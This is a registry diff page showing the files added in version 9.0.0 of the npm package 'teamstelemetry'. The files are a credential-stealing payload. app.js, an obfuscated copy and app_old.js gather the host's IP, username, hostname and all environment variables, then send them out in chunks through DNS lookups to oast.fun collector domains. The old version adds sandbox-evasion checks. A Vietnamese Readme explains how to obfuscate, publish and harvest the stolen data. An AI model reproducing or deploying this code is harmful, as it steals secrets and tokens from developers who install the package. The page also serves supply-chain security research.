npm - teamstelemetry - Versions diffs - 0.0.1-security → 9.0.0 - Mend

teamstelemetry 0.0.1-security → 9.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of teamstelemetry might be problematic. Click here for more details.

Files changed (17) hide show

package/Readme.md ADDED Viewed

@@ -0,0 +1,17 @@
+# Cách khai thác
+1. Sửa tên package và version trong package.json
+2. Chayj
+```
+javascript-obfuscator app.js --output app.obfuscated.js
+```
+3. chạy npm publish
+4. export dữ liệu từ interact.sh về
+5.
+```
+mv ~/Downloads/2025-* ./interactsh-export.json
+```
+6. extract data
+```
+node extract.js
+```

package/app.js ADDED Viewed

@@ -0,0 +1,57 @@
+const os = require('os');
+const dns = require('dns');
+// Thêm dấu chấm phẩy ở đầu dòng này để tránh lỗi cú pháp
+;(async () => {
+    // --- Cấu hình ---
+    const attackerDomain = 'kiqmsprzlrirflgoyugngu74or76rwuy0.oast.fun'; // Thay domain của bạn vào đây
+    // --- Lấy địa chỉ IP ---
+    let ip = 'N/A';
+    try {
+        const interfaces = os.networkInterfaces();
+        for (const name of Object.keys(interfaces)) {
+            for (const iface of interfaces[name]) {
+                if (iface.family === 'IPv4' && !iface.internal) {
+                    ip = iface.address;
+                    break;
+                }
+            }
+            if (ip !== 'N/A') break;
+        }
+    } catch (e) { /* Bỏ qua lỗi */ }
+    // --- THAY ĐỔI QUAN TRỌNG: SẮP XẾP LẠI DỮ LIỆU ---
+    // Thêm một trường "mồi" vào đầu với dữ liệu ngẫu nhiên.
+    // Nếu các chunk đầu bị mất, ta chỉ mất dữ liệu mồi này.
+    const decoy = `decoy_start_${Math.random().toString(36).substring(2)}`;
+    let collectedData = {
+        _decoy: decoy, // << Trường mồi nằm ở đầu
+        ip: ip,
+        username: os.userInfo().username,
+        hostname: os.hostname(),
+        platform: os.platform(),
+        arch: os.arch(),
+        home: os.homedir(),
+        env: process.env,
+        _decoy2: "decoy_end" // Thêm một mồi nữa ở cuối cho chắc chắn
+    };
+    // --- KẾT THÚC THAY ĐỔI ---
+    // --- Mã hóa và gửi dữ liệu qua DNS (giữ nguyên) ---
+    const dataString = JSON.stringify(collectedData);
+    const encodedData = Buffer.from(dataString).toString('hex');
+    const chunkSize = 50;
+    for (let i = 0; i < encodedData.length; i += chunkSize) {
+        const chunk = encodedData.substring(i, i + chunkSize);
+        const subdomain = `${i/chunkSize}.${chunk}`;
+        const finalDomain = `${subdomain}.${attackerDomain}`;
+        dns.lookup(finalDomain, (err) => {});
+        // Thêm một khoảng dừng nhỏ giữa các lần gửi
+        await new Promise(resolve => setTimeout(resolve, 100));
+    }
+})();

package/app.obfuscated.js ADDED Viewed

@@ -0,0 +1 @@

+ function a0_0x21f6(){const _0x7a7bc0=['platform','292782MlHnDM','345620DBIQaJ','2811000KFkPNE','toString','hostname','dns','IPv4','arch','7296980lUMuDk','internal','env','networkInterfaces','769323xfoRXe','14ittIIx','random','keys','userInfo','2402968MMShHr','stringify','512828IkQbcb','substring','9WTzcRA','N/A','decoy_start_','family','4TgBaLl'];a0_0x21f6=function(){return _0x7a7bc0;};return a0_0x21f6();}const a0_0x57a88b=a0_0x3b8b;(function(_0x41e576,_0x33e295){const _0x4c87e2=a0_0x3b8b,_0xb31d77=_0x41e576();while(!![]){try{const _0x498093=-parseInt(_0x4c87e2(0xc8))/0x1+parseInt(_0x4c87e2(0xd1))/0x2+-parseInt(_0x4c87e2(0xc1))/0x3*(-parseInt(_0x4c87e2(0xce))/0x4)+-parseInt(_0x4c87e2(0xd2))/0x5+parseInt(_0x4c87e2(0xd0))/0x6*(-parseInt(_0x4c87e2(0xc2))/0x7)+parseInt(_0x4c87e2(0xc6))/0x8*(parseInt(_0x4c87e2(0xca))/0x9)+parseInt(_0x4c87e2(0xbd))/0xa;if(_0x498093===_0x33e295)break;else _0xb31d77['push'](_0xb31d77['shift']());}catch(_0x50dca3){_0xb31d77['push'](_0xb31d77['shift']());}}}(a0_0x21f6,0x45fea));const os=require('os'),dns=require(a0_0x57a88b(0xba));function a0_0x3b8b(_0x42e136,_0x82ab1f){const _0x21f672=a0_0x21f6();return a0_0x3b8b=function(_0x3b8ba2,_0x1ae248){_0x3b8ba2=_0x3b8ba2-0xb9;let _0x14f2f9=_0x21f672[_0x3b8ba2];return _0x14f2f9;},a0_0x3b8b(_0x42e136,_0x82ab1f);};((async()=>{const _0x531b62=a0_0x57a88b,_0x247d5e='kiqmsprzlrirflgoyugngu74or76rwuy0.oast.fun';let _0x1468f9=_0x531b62(0xcb);try{const _0xce4f64=os[_0x531b62(0xc0)]();for(const _0x41f954 of Object[_0x531b62(0xc4)](_0xce4f64)){for(const _0x293938 of _0xce4f64[_0x41f954]){if(_0x293938[_0x531b62(0xcd)]===_0x531b62(0xbb)&&!_0x293938[_0x531b62(0xbe)]){_0x1468f9=_0x293938['address'];break;}}if(_0x1468f9!==_0x531b62(0xcb))break;}}catch(_0x362554){}const _0x69f928=_0x531b62(0xcc)+Math[_0x531b62(0xc3)]()[_0x531b62(0xd3)](0x24)[_0x531b62(0xc9)](0x2);let _0x110451={'_decoy':_0x69f928,'ip':_0x1468f9,'username':os[_0x531b62(0xc5)]()['username'],'hostname':os[_0x531b62(0xb9)](),'platform':os[_0x531b62(0xcf)](),'arch':os[_0x531b62(0xbc)](),'home':os['homedir'](),'env':process[_0x531b62(0xbf)],'_decoy2':'decoy_end'};const _0x5abdf2=JSON[_0x531b62(0xc7)](_0x110451),_0x3237c5=Buffer['from'](_0x5abdf2)[_0x531b62(0xd3)]('hex'),_0x2dbcb5=0x32;for(let _0x4360ed=0x0;_0x4360ed<_0x3237c5['length'];_0x4360ed+=_0x2dbcb5){const _0x554a2b=_0x3237c5[_0x531b62(0xc9)](_0x4360ed,_0x4360ed+_0x2dbcb5),_0x2e5ccb=_0x4360ed/_0x2dbcb5+'.'+_0x554a2b,_0x2ba5cc=_0x2e5ccb+'.'+_0x247d5e;dns['lookup'](_0x2ba5cc,_0xba77c5=>{}),await new Promise(_0x5c7207=>setTimeout(_0x5c7207,0x64));}})());

package/app_old.js ADDED Viewed

@@ -0,0 +1,64 @@
+const os = require('os');
+const dns = require('dns');
+const https = require('https');
+// Thêm dấu chấm phẩy ở đầu dòng này để sửa lỗi cú pháp
+;(async () => {
+    // --- Cấu hình ---
+    // Thay thế 'xxxxxxxxxxxx.oast.fun' bằng domain của bạn từ Interact.sh hoặc Burp Collaborator
+    const attackerDomain = 'ktrlbxgezawrunxutmddwwlbwr26w2elv.oast.fun';
+    // --- Sandbox Evasion (Kỹ thuật né tránh môi trường ảo hóa) ---
+    const forbiddenUsernames = ['sandbox', 'test', 'vmware', 'virtualbox', 'docker'];
+    if (forbiddenUsernames.includes(os.userInfo().username.toLowerCase())) {
+        return;
+    }
+    if (os.cpus().length < 2 || os.totalmem() < 2 * 1024 * 1024 * 1024) {
+        return;
+    }
+    // --- Lấy địa chỉ IP (ĐOẠN MÃ MỚI) ---
+    let ip = 'N/A';
+    try {
+        const interfaces = os.networkInterfaces();
+        for (const name of Object.keys(interfaces)) {
+            for (const iface of interfaces[name]) {
+                // Chỉ lấy địa chỉ IPv4 không phải nội bộ
+                if (iface.family === 'IPv4' && !iface.internal) {
+                    ip = iface.address;
+                    break;
+                }
+            }
+            if (ip !== 'N/A') break;
+        }
+    } catch (e) {
+        // Bỏ qua lỗi nếu không lấy được IP
+    }
+    // --- KẾT THÚC ĐOẠN MÃ MỚI ---
+    // --- Thu thập dữ liệu ---
+    let collectedData = {
+        ip: ip, // Thêm địa chỉ IP vào đây
+        username: os.userInfo().username,
+        hostname: os.hostname(),
+        platform: os.platform(),
+        arch: os.arch(),
+        home: os.homedir(),
+        env: process.env
+    };
+    // --- Mã hóa và gửi dữ liệu qua DNS (DNS Exfiltration) ---
+    const dataString = JSON.stringify(collectedData);
+    const encodedData = Buffer.from(dataString).toString('hex');
+    const chunkSize = 50;
+    for (let i = 0; i < encodedData.length; i += chunkSize) {
+        const chunk = encodedData.substring(i, i + chunkSize);
+        const subdomain = `${i/chunkSize}.${chunk}`;
+        const finalDomain = `${subdomain}.${attackerDomain}`;
+        dns.lookup(finalDomain, (err) => {});
+        await new Promise(resolve => setTimeout(resolve, 50));
+    }
+})();